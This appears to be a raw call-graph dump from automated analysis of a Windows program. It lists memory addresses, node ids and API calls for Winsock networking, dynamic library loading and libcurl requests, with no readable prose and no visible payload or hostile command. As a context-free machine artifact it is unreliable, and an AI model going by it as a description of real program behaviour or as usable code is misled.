7ff8b7e6c990 94762->94847 94764 7ff8b7e74bb0 14 API calls 94767 7ff8b7e67b05 94764->94767 94765 7ff8b7e67a73 94768 7ff8b7e67b2e 94765->94768 94769 7ff8b7e67a7b _errno _errno _errno 94765->94769 94766 7ff8b7e68110 2 API calls 94821 7ff8b7e67ae1 94766->94821 94770 7ff8b7ec9e10 8 API calls 94767->94770 94771 7ff8b7e67b65 94768->94771 94772 7ff8b7e67b37 setsockopt 94768->94772 94856 7ff8b7eaec40 21 API calls 94769->94856 94774 7ff8b7e65f04 94770->94774 94776 7ff8b7e74b60 18 API calls 94771->94776 94772->94771 94774->94727 94774->94735 94774->94736 94774->94737 94775 7ff8b7e67aac 94857 7ff8b7e74a70 14 API calls 94775->94857 94778 7ff8b7e67b82 94776->94778 94780 7ff8b7e67bf9 94778->94780 94781 7ff8b7e67ba2 setsockopt 94778->94781 94779->94766 94779->94821 94783 7ff8b7ebc700 21 API calls 94780->94783 94788 7ff8b7e67c40 94780->94788 94781->94780 94782 7ff8b7e67bcf WSAGetLastError 94781->94782 94858 7ff8b7eaec40 21 API calls 94782->94858 94783->94788 94784 7ff8b7e67c61 getsockopt 94789 7ff8b7e67c88 94784->94789 94790 7ff8b7e67c92 setsockopt 94784->94790 94785 7ff8b7e67c44 94791 7ff8b7e67cc9 setsockopt 94785->94791 94796 7ff8b7e67df8 94785->94796 94787 7ff8b7e67be7 94792 7ff8b7e74b60 18 API calls 94787->94792 94788->94784 94788->94785 94789->94785 94789->94790 94790->94785 94793 7ff8b7e67cf9 WSAGetLastError 94791->94793 94794 7ff8b7e67d0b 94791->94794 94792->94780 94795 7ff8b7e67dea 94793->94795 94800 7ff8b7e67d16 setsockopt 94794->94800 94799 7ff8b7e74b60 18 API calls 94795->94799 94796->94779 94797 7ff8b7e67e54 94796->94797 94798 7ff8b7e67e8d 94796->94798 94859 7ff8b7e67410 555 API calls 94797->94859 94855 7ff8b7e9c2d0 ioctlsocket 94798->94855 94799->94796 94801 7ff8b7e67d3f WSAGetLastError 94800->94801 94802 7ff8b7e67d5a 94800->94802 94805 7ff8b7e74b60 18 API calls 94801->94805 94808 7ff8b7e67d65 setsockopt 94802->94808 94805->94802 94806 7ff8b7e67e9a 94809 7ff8b7e67e9e WSAGetLastError 94806->94809 94810 7ff8b7e67eb5 94806->94810 94807 7ff8b7e67e74 94807->94798 94811 7ff8b7e67e7a 94807->94811 94812 7ff8b7e67d8e WSAGetLastError 94808->94812 94813 7ff8b7e67da9 94808->94813 94809->94779 94810->94779 94814 7ff8b7e67ecc 94810->94814 94811->94779 94815 7ff8b7e74b60 18 API calls 94812->94815 94816 7ff8b7e67db4 setsockopt 94813->94816 94817 7ff8b7e67f90 34 API calls 94814->94817 94814->94821 94815->94813 94816->94796 94818 7ff8b7e67ddd WSAGetLastError 94816->94818 94819 7ff8b7e67ee0 94817->94819 94818->94795 94820 7ff8b7eb3b60 2 API calls 94819->94820 94820->94821 94821->94764 94823 7ff8b7e67fc7 94822->94823 94836 7ff8b7e68067 94822->94836 94824 7ff8b7e67fe2 getsockname 94823->94824 94823->94836 94826 7ff8b7e6806e 94824->94826 94827 7ff8b7e68035 WSAGetLastError 94824->94827 94825 7ff8b7ec9e10 8 API calls 94828 7ff8b7e65f62 94825->94828 94830 7ff8b7e6c990 11 API calls 94826->94830 94860 7ff8b7eaec40 21 API calls 94827->94860 94828->94748 94832 7ff8b7e6808a 94830->94832 94831 7ff8b7e68052 94861 7ff8b7e74a70 14 API calls 94831->94861 94834 7ff8b7e6808e _errno _errno 94832->94834 94832->94836 94862 7ff8b7eaec40 21 API calls 94834->94862 94836->94825 94837 7ff8b7e680bc 94863 7ff8b7e74a70 14 API calls 94837->94863 94840 7ff8b7e660e3 94839->94840 94841 7ff8b7e68321 WSAGetLastError 94839->94841 94840->94727 94840->94746 94841->94840 94842->94727 94843->94747 94845 7ff8b7e6827a socket 94844->94845 94846 7ff8b7e68252 94844->94846 94845->94846 94846->94762 94848 7ff8b7e6ca22 94847->94848 94851 7ff8b7e6c9b4 94847->94851 94849 7ff8b7e6ca3f 94848->94849 94853 7ff8b7e94eb0 8 API calls 94848->94853 94849->94765 94850 7ff8b7e6c9fb _errno 94850->94765 94851->94850 94852 7ff8b7e6c9c4 inet_ntop 94851->94852 94852->94850 94854 7ff8b7e6c9d4 htons 94852->94854 94853->94849 94854->94765 94855->94806 94856->94775 94857->94779 94858->94787 94859->94807 94860->94831 94861->94836 94862->94837 94863->94836 94864 7ff8b7e68420 94865 7ff8b7e6842d 94864->94865 94866 7ff8b7e68440 94864->94866 94869 7ff8b7ec3ba0 94865->94869 94870 7ff8b7ec3bcb 94869->94870 94871 7ff8b7e68433 94870->94871 94873 7ff8b7e66250 94870->94873 94874 7ff8b7ea2690 19 API calls 94873->94874 94875 7ff8b7e66271 94874->94875 94875->94871 94876 7ff8b7e78ea0 AcquireSRWLockExclusive 94879 7ff8b7e79070 94876->94879 94878 7ff8b7e78ebe ReleaseSRWLockExclusive 94880 7ff8b7e79092 94879->94880 94882 7ff8b7e79103 94879->94882 94881 7ff8b7e79096 calloc 94880->94881 94883 7ff8b7e790ea 94880->94883 94881->94883 94882->94878 94883->94882 94885 7ff8b7eafe30 94883->94885 94886 7ff8b7eafe96 94885->94886 94887 7ff8b7eafe4e WSAStartup 94885->94887 94918 7ff8b7e74840 94886->94918 94888 7ff8b7eafe62 94887->94888 94889 7ff8b7eafe79 94887->94889 94888->94886 94892 7ff8b7eafe73 WSACleanup 94888->94892 94893 7ff8b7ec9e10 8 API calls 94889->94893 94891 7ff8b7eafe9b 94894 7ff8b7eafea3 GetModuleHandleW 94891->94894 94895 7ff8b7eb00ab 94891->94895 94892->94889 94896 7ff8b7eafe8e 94893->94896 94897 7ff8b7eafed6 GetProcAddress wcspbrk 94894->94897 94898 7ff8b7eafeca 94894->94898 94899 7ff8b7ec9e10 8 API calls 94895->94899 94896->94882 94900 7ff8b7eaff15 94897->94900 94901 7ff8b7eaff3d 94897->94901 94903 7ff8b7ebc700 21 API calls 94898->94903 94902 7ff8b7eb00bb 94899->94902 94904 7ff8b7eaff2f LoadLibraryW 94900->94904 94909 7ff8b7eaff1d 94900->94909 94905 7ff8b7eaff42 GetProcAddress 94901->94905 94906 7ff8b7eaff6c GetSystemDirectoryW 94901->94906 94902->94882 94907 7ff8b7eb0083 QueryPerformanceFrequency 94903->94907 94904->94909 94905->94906 94908 7ff8b7eaff57 LoadLibraryExW 94905->94908 94906->94909 94910 7ff8b7eaff89 malloc 94906->94910 94907->94895 94908->94909 94909->94898 94911 7ff8b7eb004a GetProcAddress 94909->94911 94912 7ff8b7eaffa2 GetSystemDirectoryW 94910->94912 94913 7ff8b7eb001d free 94910->94913 94911->94898 94914 7ff8b7eb005f 94911->94914 94912->94913 94915 7ff8b7eaffb2 94912->94915 94913->94909 94914->94898 94916 7ff8b7eb0014 LoadLibraryW 94915->94916 94917 7ff8b7eb0008 94915->94917 94916->94917 94917->94913 94919 7ff8b7e748d5 94918->94919 94920 7ff8b7e74852 94918->94920 94919->94891 94921 7ff8b7ebc700 21 API calls 94920->94921 94922 7ff8b7e74872 94921->94922 94927 7ff8b7eafc30 GetModuleHandleW 94922->94927 94924 7ff8b7e7488b 94925 7ff8b7e74897 GetProcAddressForCaller 94924->94925 94926 7ff8b7e748ac 94924->94926 94925->94926 94926->94891 94928 7ff8b7eafc52 94927->94928 94929 7ff8b7eafc5a GetProcAddress wcspbrk 94927->94929 94928->94924 94930 7ff8b7eafc87 LoadLibraryW 94929->94930 94931 7ff8b7eafcbc 94929->94931 94930->94931 94933 7ff8b7eafcf3 GetSystemDirectoryW 94931->94933 94934 7ff8b7eafcc1 GetProcAddress 94931->94934 94935 7ff8b7eafdbc 94933->94935 94936 7ff8b7eafd0d malloc 94933->94936 94934->94933 94937 7ff8b7eafcd6 94934->94937 94935->94924 94939 7ff8b7eafd40 GetSystemDirectoryW 94936->94939 94940 7ff8b7eafdae free 94936->94940 94937->94933 94939->94940 94941 7ff8b7eafd50 94939->94941 94940->94935 94942 7ff8b7eafda5 LoadLibraryW 94941->94942 94943 7ff8b7eafd98 94941->94943 94942->94943 94943->94940 94944 7ff8b7e849e0 94945 7ff8b7e84a30 94944->94945 94945->94945 94946 7ff8b7e84a87 94945->94946 94949 7ff8b7e84a73 94945->94949 94993 7ff8b7e850c0 94946->94993 95014 7ff8b7e74a70 14 API calls 94949->95014 94951 7ff8b7e74b60 18 API calls 94956 7ff8b7e84ade 94951->94956 94952 7ff8b7e84b49 inet_pton 94954 7ff8b7e84b67 inet_pton 94952->94954 94955 7ff8b7e84b61 94952->94955 94953 7ff8b7ec9e10 8 API calls 94957 7ff8b7e84f23 94953->94957 94954->94955 94958 7ff8b7e84c0d 94954->94958 95015 7ff8b7e718a0 10 API calls 94955->95015 94956->94952 94960 7ff8b7e84a82 94956->94960 94968 7ff8b7e84c2e 94958->94968 95018 7ff8b7e843b0 94958->95018 94960->94953 94961 7ff8b7e84ba0 94964 7ff8b7e84b94 94961->94964 94963 7ff8b7e84cfb htons inet_pton 94970 7ff8b7e84d4e calloc 94963->94970 94979 7ff8b7e84cd6 94963->94979 94964->94960 94964->94961 95016 7ff8b7e83e50 29 API calls 94964->95016 94966 7ff8b7e84bd8 94971 7ff8b7e84ef3 94966->94971 94972 7ff8b7e84c00 94966->94972 94968->94960 94968->94963 94969 7ff8b7e84ca0 94968->94969 94973 7ff8b7e84ccb 94969->94973 94978 7ff8b7e84cae 94969->94978 94984 7ff8b7e84d73 94970->94984 94991 7ff8b7e84cc0 94970->94991 95027 7ff8b7e852d0 22 API calls SimpleString::operator= 94971->95027 95017 7ff8b7e716c0 free 94972->95017 95005 7ff8b7e85510 94973->95005 94976 7ff8b7e84ea3 94976->94960 94982 7ff8b7e84ebb 94976->94982 94983 7ff8b7e84ec2 94976->94983 95023 7ff8b7e763d0 486 API calls 94978->95023 94979->94960 94979->94961 94979->94976 94980 7ff8b7e84c08 94980->94960 95024 7ff8b7e766b0 472 API calls 94982->95024 95025 7ff8b7e625a0 47 API calls 94983->95025 94984->94984 94987 7ff8b7e84dd9 calloc 94984->94987 94988 7ff8b7e84df4 htons inet_pton 94987->94988 94987->94991 94988->94991 94989 7ff8b7e84ec0 94990 7ff8b7e84ec7 94989->94990 94990->94960 95026 7ff8b7e852d0 22 API calls SimpleString::operator= 94990->95026 94991->94979 94991->94991 94994 7ff8b7e850f0 94993->94994 94995 7ff8b7e94eb0 8 API calls 94994->94995 94996 7ff8b7e8512e 94995->94996 95001 7ff8b7e94eb0 8 API calls 94996->95001 95003 7ff8b7e8518d 94996->95003 95004 7ff8b7e851ec 94996->95004 94997 7ff8b7e851bd _time64 94999 7ff8b7e851ce 94997->94999 94998 7ff8b7ec9e10 8 API calls 95000 7ff8b7e84ac3 94998->95000 95002 7ff8b7e74b60 18 API calls 94999->95002 94999->95004 95000->94951 95000->94956 95001->95003 95002->95004 95003->94997 95003->94999 95003->95004 95004->94998 95006 7ff8b7e8551d 95005->95006 95007 7ff8b7e843b0 95005->95007 95006->94979 95008 7ff8b7e843be 95007->95008 95009 7ff8b7e84400 socket 95007->95009 95010 7ff8b7e843d5 95008->95010 95013 7ff8b7e843b0 2 API calls 95008->95013 95011 7ff8b7e84419 95009->95011 95012 7ff8b7e84426 closesocket 95009->95012 95010->94979 95011->94979 95012->94979 95013->95010 95014->94960 95015->94964 95016->94966 95017->94980 95019 7ff8b7e84400 socket 95018->95019 95020 7ff8b7e843be 95018->95020 95021 7ff8b7e84419 95019->95021 95022 7ff8b7e84426 closesocket 95019->95022 95020->94968 95021->94968 95022->94968 95023->94991 95024->94989 95025->94990 95026->94960 95027->94960 95028 7ff8b7e789e0 95029 7ff8b7e789ef 95028->95029 95030 7ff8b7e789fb 95028->95030 95031 7ff8b7e78a1b 95030->95031 95032 7ff8b7e78a33 95030->95032 95083 7ff8b7e74a70 14 API calls 95031->95083 95033 7ff8b7e78a44 95032->95033 95040 7ff8b7e78a72 95032->95040 95084 7ff8b7e97a80 506 API calls 95033->95084 95035 7ff8b7e78a27 95037 7ff8b7e78a7b 95038 7ff8b7e78a59 95039 7ff8b7e78a61 95038->95039 95038->95040 95040->95037 95052 7ff8b7e985f0 95040->95052 95042 7ff8b7e78ab7 95043 7ff8b7e78abd 95042->95043 95050 7ff8b7e78ae8 95042->95050 95085 7ff8b7e98810 459 API calls 95043->95085 95045 7ff8b7e78ac5 95048 7ff8b7e78b62 95051 7ff8b7e78b42 95050->95051 95061 7ff8b7e99150 95050->95061 95064 7ff8b7e98eb0 95050->95064 95086 7ff8b7e99180 459 API calls 95051->95086 95053 7ff8b7e98609 95052->95053 95054 7ff8b7e98634 95052->95054 95053->95054 95056 7ff8b7e9869b 95053->95056 95087 7ff8b7e98810 459 API calls 95053->95087 95054->95042 95088 7ff8b7e974f0 20 API calls 95056->95088 95058 7ff8b7e986dc 95089 7ff8b7e98370 10 API calls 95058->95089 95060 7ff8b7e986e4 95060->95042 95090 7ff8b7e9b4e0 95061->95090 95065 7ff8b7eb3b60 2 API calls 95064->95065 95070 7ff8b7e98ee7 95065->95070 95066 7ff8b7ec9e10 8 API calls 95067 7ff8b7e99135 95066->95067 95067->95050 95068 7ff8b7e98f70 95177 7ff8b7e6ab50 293 API calls 95068->95177 95070->95068 95074 7ff8b7e98f0c 95070->95074 95158 7ff8b7e99e10 95070->95158 95073 7ff8b7e990f4 95073->95074 95181 7ff8b7e98370 10 API calls 95073->95181 95074->95066 95076 7ff8b7e6cfb0 10 API calls 95081 7ff8b7e98f78 95076->95081 95078 7ff8b7e74a70 14 API calls 95078->95081 95079 7ff8b7e74b60 18 API calls 95079->95081 95080 7ff8b7e998c0 459 API calls 95080->95081 95081->95073 95081->95076 95081->95078 95081->95079 95081->95080 95178 7ff8b7eadda0 8 API calls 95081->95178 95179 7ff8b7e99840 20 API calls 95081->95179 95180 7ff8b7e98480 8 API calls 95081->95180 95083->95035 95084->95038 95085->95045 95086->95048 95087->95056 95088->95058 95089->95060 95091 7ff8b7e9b54d 95090->95091 95094 7ff8b7e9b538 95090->95094 95092 7ff8b7ec9e10 8 API calls 95091->95092 95093 7ff8b7e9916d 95092->95093 95093->95050 95094->95091 95095 7ff8b7e9b5e2 95094->95095 95100 7ff8b7e9b5a3 95094->95100 95128 7ff8b7e69d10 95095->95128 95097 7ff8b7e9b5f4 95099 7ff8b7e9b67d 95097->95099 95109 7ff8b7e9b617 95097->95109 95114 7ff8b7e9b751 95097->95114 95102 7ff8b7e9b75c 95099->95102 95106 7ff8b7e9b6bc getsockopt 95099->95106 95107 7ff8b7e9b713 WSAEventSelect 95099->95107 95110 7ff8b7e9b6f9 send 95099->95110 95100->95095 95100->95114 95140 7ff8b7e99ba0 14 API calls 95100->95140 95141 7ff8b7ea24d0 calloc memmove free 95100->95141 95133 7ff8b7e9b3c0 95102->95133 95106->95099 95107->95099 95107->95114 95108 7ff8b7e9b76d 95111 7ff8b7e9b795 95108->95111 95112 7ff8b7ea2110 17 API calls 95108->95112 95109->95099 95109->95114 95142 7ff8b7ea2630 calloc memmove free 95109->95142 95110->95099 95113 7ff8b7e9b7a0 WSAWaitForMultipleEvents 95111->95113 95111->95114 95117 7ff8b7e9b7c5 95111->95117 95119 7ff8b7e9b9e5 95111->95119 95112->95111 95113->95117 95144 7ff8b7ea2640 free 95114->95144 95115 7ff8b7e9b7f0 WSAEnumNetworkEvents 95115->95117 95118 7ff8b7e9b8b2 WSAEventSelect 95115->95118 95116 7ff8b7e9b9c6 WSAResetEvent 95116->95119 95117->95115 95117->95118 95121 7ff8b7e9b861 WSAEventSelect 95117->95121 95126 7ff8b7e9b917 95117->95126 95118->95117 95119->95114 95120 7ff8b7e9b3c0 10 API calls 95119->95120 95122 7ff8b7e9ba29 95120->95122 95121->95117 95122->95114 95123 7ff8b7e9ba3f 95122->95123 95143 7ff8b7ea27f0 WSASetLastError Sleep 95123->95143 95124 7ff8b7e9b960 WSAEnumNetworkEvents 95124->95126 95127 7ff8b7e9b98b WSAEventSelect 95124->95127 95126->95116 95126->95124 95126->95127 95127->95124 95127->95126 95129 7ff8b7e69d93 95128->95129 95130 7ff8b7e69d25 95128->95130 95145 7ff8b7e6b250 95130->95145 95132 7ff8b7e69d5d 95132->95097 95134 7ff8b7e9b3e1 95133->95134 95135 7ff8b7e9b3fa 95133->95135 95134->95108 95136 7ff8b7e9b437 95135->95136 95137 7ff8b7eb3b60 2 API calls 95135->95137 95136->95108 95138 7ff8b7e9b417 95137->95138 95157 7ff8b7eadc20 8 API calls 95138->95157 95140->95100 95141->95100 95142->95109 95143->95114 95144->95091 95147 7ff8b7e6b276 95145->95147 95146 7ff8b7e6b311 95148 7ff8b7ec9e10 8 API calls 95146->95148 95147->95146 95150 7ff8b7e6b294 95147->95150 95149 7ff8b7e6b31e 95148->95149 95149->95132 95152 7ff8b7e6b326 95150->95152 95154 7ff8b7e6b307 95150->95154 95155 7ff8b7ea24d0 calloc memmove free 95150->95155 95156 7ff8b7ea2640 free 95152->95156 95154->95146 95155->95150 95156->95154 95157->95136 95159 7ff8b7e99e50 95158->95159 95160 7ff8b7e9b186 95158->95160 95159->95160 95161 7ff8b7e998c0 459 API calls 95159->95161 95168 7ff8b7e99ed9 95159->95168 95160->95070 95162 7ff8b7e99e86 95161->95162 95166 7ff8b7e99eaf 95162->95166 95162->95168 95182 7ff8b7e9ba90 free free 95162->95182 95163 7ff8b7e6cfb0 10 API calls 95163->95168 95183 7ff8b7e97540 18 API calls 95166->95183 95167 7ff8b7e74a70 14 API calls 95167->95168 95168->95163 95168->95167 95169 7ff8b7e998c0 459 API calls 95168->95169 95171 7ff8b7e9b0e4 95168->95171 95173 7ff8b7e99840 20 API calls 95168->95173 95175 7ff8b7e9ba90 free free 95168->95175 95176 7ff8b7e6a330 298 API calls 95168->95176 95184 7ff8b7e9f410 QueryPerformanceCounter GetTickCount 95168->95184 95185 7ff8b7e97540 18 API calls 95168->95185 95186 7ff8b7e9f2d0 17 API calls 95168->95186 95169->95168 95171->95070 95173->95168 95175->95168 95176->95168 95177->95081 95178->95081 95179->95081 95180->95081 95181->95074 95182->95166 95183->95168 95184->95168 95185->95168 95186->95168 95187 7ff8b7ea2a90 95188 7ff8b7ea2ad1 95187->95188 95189 7ff8b7ea2aed 95187->95189 95188->95189 95191 7ff8b7e9ef80 2 API calls 95188->95191 95190 7ff8b7ea2b51 95189->95190 95192 7ff8b7ea2af9 95189->95192 95194 7ff8b7ea2b63 95190->95194 95198 7ff8b7ea2ba4 95190->95198 95191->95189 95193 7ff8b7ea2b4a 95192->95193 95218 7ff8b7e74e50 18 API calls 95192->95218 95219 7ff8b7e74e50 18 API calls 95194->95219 95197 7ff8b7ea2c0c 95199 7ff8b7ea2c60 95197->95199 95200 7ff8b7ea2c7f 95197->95200 95201 7ff8b7ea2ca8 95197->95201 95198->95197 95203 7ff8b7ea2bf3 95198->95203 95221 7ff8b7e74e50 18 API calls 95199->95221 95212 7ff8b7e755f0 95200->95212 95201->95193 95204 7ff8b7ea2cd2 95201->95204 95205 7ff8b7ea2d39 95201->95205 95220 7ff8b7e74a70 14 API calls 95203->95220 95204->95193 95209 7ff8b7e74b60 18 API calls 95204->95209 95205->95193 95223 7ff8b7e74a70 14 API calls 95205->95223 95209->95193 95213 7ff8b7e7562a 95212->95213 95214 7ff8b7e75657 95213->95214 95224 7ff8b7e759d0 95213->95224 95216 7ff8b7e7567f 95214->95216 95217 7ff8b7e759d0 104 API calls 95214->95217 95222 7ff8b7e74e50 18 API calls 95216->95222 95217->95216 95218->95193 95219->95193 95220->95193 95221->95193 95222->95201 95223->95193 95225 7ff8b7e759fc 95224->95225 95226 7ff8b7e75a0e 95224->95226 95225->95226 95257 7ff8b7e75af0 102 API calls 95225->95257 95227 7ff8b7e75a5c 95226->95227 95228 7ff8b7e75a22 95226->95228 95235 7ff8b7e75ab9 95226->95235 95242 7ff8b7e75c60 95227->95242 95258 7ff8b7e758a0 calloc 95228->95258 95232 7ff8b7e75a8f 95234 7ff8b7e75ac5 95232->95234 95236 7ff8b7e75a9f 95232->95236 95233 7ff8b7e75a39 95233->95234 95259 7ff8b7e75af0 102 API calls 95233->95259 95234->95214 95261 7ff8b7e75970 free free 95235->95261 95260 7ff8b7e758a0 calloc 95236->95260 95240 7ff8b7e75a54 95240->95234 95240->95235 95241 7ff8b7e75a5a 95240->95241 95241->95234 95243 7ff8b7e75c7b 95242->95243 95245 7ff8b7e75c86 95242->95245 95243->95232 95244 7ff8b7e75cf2 95244->95232 95245->95244 95247 7ff8b7e75e1c 95245->95247 95248 7ff8b7e75e35 95245->95248 95252 7ff8b7e75e00 95245->95252 95262 7ff6cf975860 95245->95262 95283 7ff8b7e74e50 18 API calls 95245->95283 95285 7ff8b7e74a70 14 API calls 95247->95285 95249 7ff8b7e75e64 95248->95249 95250 7ff8b7e75e4e 95248->95250 95287 7ff8b7e74e50 18 API calls 95249->95287 95286 7ff8b7e74a70 14 API calls 95250->95286 95284 7ff8b7e74a70 14 API calls 95252->95284 95257->95226 95258->95233 95259->95240 95260->95240 95261->95234 95263 7ff6cf9758b2 curl_easy_setopt curl_easy_setopt curl_easy_setopt curl_easy_setopt curl_easy_setopt 95262->95263 95264 7ff6cf9758af 95262->95264 95268 7ff6cf975933 curl_easy_setopt 95263->95268 95264->95263 95266 7ff6cf975984 curl_easy_setopt curl_easy_perform 95269 7ff6cf9759cc curl_easy_strerror 95266->95269 95270 7ff6cf975a89 95266->95270 95268->95266 95271 7ff6cf9759f0 95269->95271 95303 7ff6cf977c00 71 API calls 4 library calls 95270->95303 95271->95271 95293 7ff6cf97b6c0 71 API calls 95271->95293 95273 7ff6cf975a60 numpunct 95294 7ff6cf9a3b30 95273->95294 95276 7ff6cf975ace 95288 7ff6cf9b1878 95276->95288 95277 7ff6cf975a07 95277->95273 95277->95276 95283->95245 95284->95244 95285->95244 95286->95244 95287->95244 95304 7ff6cf9b1704 69 API calls _invalid_parameter_noinfo 95288->95304 95290 7ff6cf9b1891 95305 7ff6cf9b18a8 17 API calls BuildCatchObjectHelperInternal 95290->95305 95295 7ff6cf9a3b39 95294->95295 95296 7ff6cf975a75 95295->95296 95297 7ff6cf9a45a4 IsProcessorFeaturePresent 95295->95297 95296->95245 95298 7ff6cf9a45bc 95297->95298 95306 7ff6cf9a479c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 95298->95306 95300 7ff6cf9a45cf 95307 7ff6cf9a4570 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 95300->95307 95303->95277 95304->95290 95306->95300 95308 7ff8b7ebfed0 95309 7ff8b7e74840 32 API calls 95308->95309 95310 7ff8b7ebfed9 95309->95310 95311 7ff8b7e9aa52 95312 7ff8b7e9aa68 95311->95312 95313 7ff8b7e9aac8 95312->95313 95315 7ff8b7e9ad04 95312->95315 95367 7ff8b7eb4870 95313->95367 95317 7ff8b7e9ad63 95315->95317 95318 7ff8b7e9ad2f 95315->95318 95321 7ff8b7eb3b60 2 API calls 95317->95321 95320 7ff8b7eb3b60 2 API calls 95318->95320 95324 7ff8b7e9ad38 95320->95324 95325 7ff8b7e9ad6c 95321->95325 95322 7ff8b7e9acb7 95329 7ff8b7e998c0 459 API calls 95322->95329 95323 7ff8b7e9aaf0 95323->95322 95327 7ff8b7e9ab02 95323->95327 95394 7ff8b7e97650 18 API calls 95324->95394 95395 7ff8b7e97650 18 API calls 95325->95395 95330 7ff8b7e9ac63 95327->95330 95333 7ff8b7e9ab1f 95327->95333 95331 7ff8b7e9acf0 free 95329->95331 95330->95331 95334 7ff8b7e9ac7c 95330->95334 95332 7ff8b7e9ad56 95331->95332 95337 7ff8b7e6cfb0 10 API calls 95332->95337 95350 7ff8b7e99ee0 95332->95350 95335 7ff8b7e9ac0f 95333->95335 95338 7ff8b7e9ab35 95333->95338 95339 7ff8b7e9abea free 95333->95339 95336 7ff8b7eb3b60 2 API calls 95334->95336 95341 7ff8b7e998c0 459 API calls 95335->95341 95340 7ff8b7e9ac85 95336->95340 95337->95350 95342 7ff8b7e9ab8d free 95338->95342 95343 7ff8b7e9ab3e free 95338->95343 95339->95335 95393 7ff8b7e97650 18 API calls 95340->95393 95349 7ff8b7e9ac21 95341->95349 95342->95332 95390 7ff8b7eb3d80 45 API calls 95343->95390 95348 7ff8b7e9b0e4 95392 7ff8b7eb3d80 45 API calls 95349->95392 95350->95348 95354 7ff8b7e6cfb0 10 API calls 95350->95354 95356 7ff8b7e99840 20 API calls 95350->95356 95362 7ff8b7e74a70 14 API calls 95350->95362 95363 7ff8b7e9ba90 free free 95350->95363 95365 7ff8b7e6a330 298 API calls 95350->95365 95366 7ff8b7e998c0 459 API calls 95350->95366 95396 7ff8b7e9f410 QueryPerformanceCounter GetTickCount 95350->95396 95397 7ff8b7e97540 18 API calls 95350->95397 95398 7ff8b7e9f2d0 17 API calls 95350->95398 95351 7ff8b7e9aca3 free 95351->95332 95352 7ff8b7e9ab6a 95352->95342 95357 7ff8b7e998c0 459 API calls 95352->95357 95354->95350 95355 7ff8b7e9ac31 95355->95331 95359 7ff8b7e9ac3c free 95355->95359 95356->95350 95361 7ff8b7e9ab82 95357->95361 95359->95332 95361->95331 95361->95342 95362->95350 95363->95350 95365->95350 95366->95350 95368 7ff8b7eb48a3 95367->95368 95371 7ff8b7eb48e5 95368->95371 95383 7ff8b7e9aad7 95368->95383 95399 7ff8b7eb5010 95368->95399 95370 7ff8b7eb492c 95370->95383 95410 7ff8b7e9f2d0 17 API calls 95370->95410 95371->95370 95371->95383 95409 7ff8b7ea03f0 34 API calls 95371->95409 95374 7ff8b7eb4954 95374->95383 95411 7ff8b7eadb30 20 API calls 95374->95411 95376 7ff8b7eb4972 95377 7ff8b7eb4a42 95376->95377 95378 7ff8b7eb4985 95376->95378 95376->95383 95379 7ff8b7eb4a80 95377->95379 95384 7ff8b7eb4a67 95377->95384 95380 7ff8b7e6cfb0 10 API calls 95378->95380 95415 7ff8b7e9f2d0 17 API calls 95379->95415 95381 7ff8b7eb4993 95380->95381 95381->95383 95385 7ff8b7eb49b0 95381->95385 95386 7ff8b7eb4a0c 95381->95386 95383->95323 95391 7ff8b7eb4710 19 API calls 95383->95391 95414 7ff8b7e74a70 14 API calls 95384->95414 95412 7ff8b7e74a70 14 API calls 95385->95412 95413 7ff8b7e74a70 14 API calls 95386->95413 95390->95352 95391->95323 95392->95355 95393->95351 95394->95332 95395->95332 95396->95350 95397->95350 95398->95350 95416 7ff8b7e98030 95399->95416 95401 7ff8b7eb5263 95401->95371 95403 7ff8b7eb51d8 95403->95401 95406 7ff8b7e74b60 18 API calls 95403->95406 95405 7ff8b7eb505d 95405->95401 95405->95403 95432 7ff8b7eb4bd0 95405->95432 95438 7ff8b7eb4f60 95405->95438 95407 7ff8b7eb525b 95406->95407 95446 7ff8b7ea0010 20 API calls 95407->95446 95409->95370 95410->95374 95411->95376 95412->95383 95413->95383 95414->95383 95415->95383 95417 7ff8b7e98061 95416->95417 95418 7ff8b7e9807a 95416->95418 95447 7ff8b7e74a70 14 API calls 95417->95447 95420 7ff8b7e98084 95418->95420 95421 7ff8b7e9809d 95418->95421 95448 7ff8b7e74a70 14 API calls 95420->95448 95423 7ff8b7e980a6 95421->95423 95424 7ff8b7e980bf 95421->95424 95449 7ff8b7e74a70 14 API calls 95423->95449 95426 7ff8b7e980f9 95424->95426 95428 7ff8b7e980d4 free 95424->95428 95427 7ff8b7e98109 malloc 95426->95427 95431 7ff8b7e98070 95426->95431 95429 7ff8b7e98139 95427->95429 95427->95431 95428->95426 95450 7ff8b7e74a70 14 API calls 95429->95450 95431->95405 95435 7ff8b7eb4bfd 95432->95435 95433 7ff8b7eb4cb9 95434 7ff8b7eb4d15 95433->95434 95436 7ff8b7e69740 232 API calls 95433->95436 95434->95405 95435->95433 95451 7ff8b7e696b0 95435->95451 95436->95434 95439 7ff8b7eb4f97 95438->95439 95440 7ff8b7eb4f9f 95438->95440 95459 7ff8b7ea3a60 95439->95459 95441 7ff8b7ea3a60 33 API calls 95440->95441 95443 7ff8b7eb4f9d 95440->95443 95441->95443 95468 7ff8b7e74e50 18 API calls 95443->95468 95444 7ff8b7eb4ff1 95444->95405 95446->95401 95447->95431 95448->95431 95449->95431 95450->95431 95454 7ff8b7ec3c50 95451->95454 95458 7ff8b7ebf4f0 230 API calls 95454->95458 95455 7ff8b7ec3c9a 95456 7ff8b7e74bb0 14 API calls 95455->95456 95457 7ff8b7e696d5 95456->95457 95457->95433 95458->95455 95460 7ff8b7ea3a92 95459->95460 95461 7ff8b7ea3a89 95459->95461 95463 7ff8b7ea3a9e 95460->95463 95469 7ff8b7ea2d70 95460->95469 95476 7ff8b7ea4500 7 API calls 95461->95476 95477 7ff8b7e74e50 18 API calls 95463->95477 95464 7ff8b7ea3a8e 95464->95460 95466 7ff8b7ea3ad4 95464->95466 95466->95443 95468->95444 95470 7ff8b7ea2da1 95469->95470 95471 7ff8b7ea2dc3 95469->95471 95470->95471 95473 7ff8b7ea2db3 95470->95473 95472 7ff8b7ea2dcc 95471->95472 95478 7ff8b7e83280 95471->95478 95472->95463 95486 7ff8b7e74980 fwrite fwrite 95473->95486 95476->95464 95477->95466 95479 7ff8b7e8330d 95478->95479 95480 7ff8b7e832b0 95478->95480 95479->95472 95480->95479 95481 7ff8b7e832bf 95480->95481 95487 7ff8b7e83460 8 API calls 95481->95487 95483 7ff8b7e832e4 95488 7ff8b7e74e50 18 API calls 95483->95488 95485 7ff8b7e83300 95485->95479 95486->95471 95487->95483 95488->95485 95489 7ff8b7ec3990 95491 7ff8b7ec39c3 95489->95491 95509 7ff8b7ec39b8 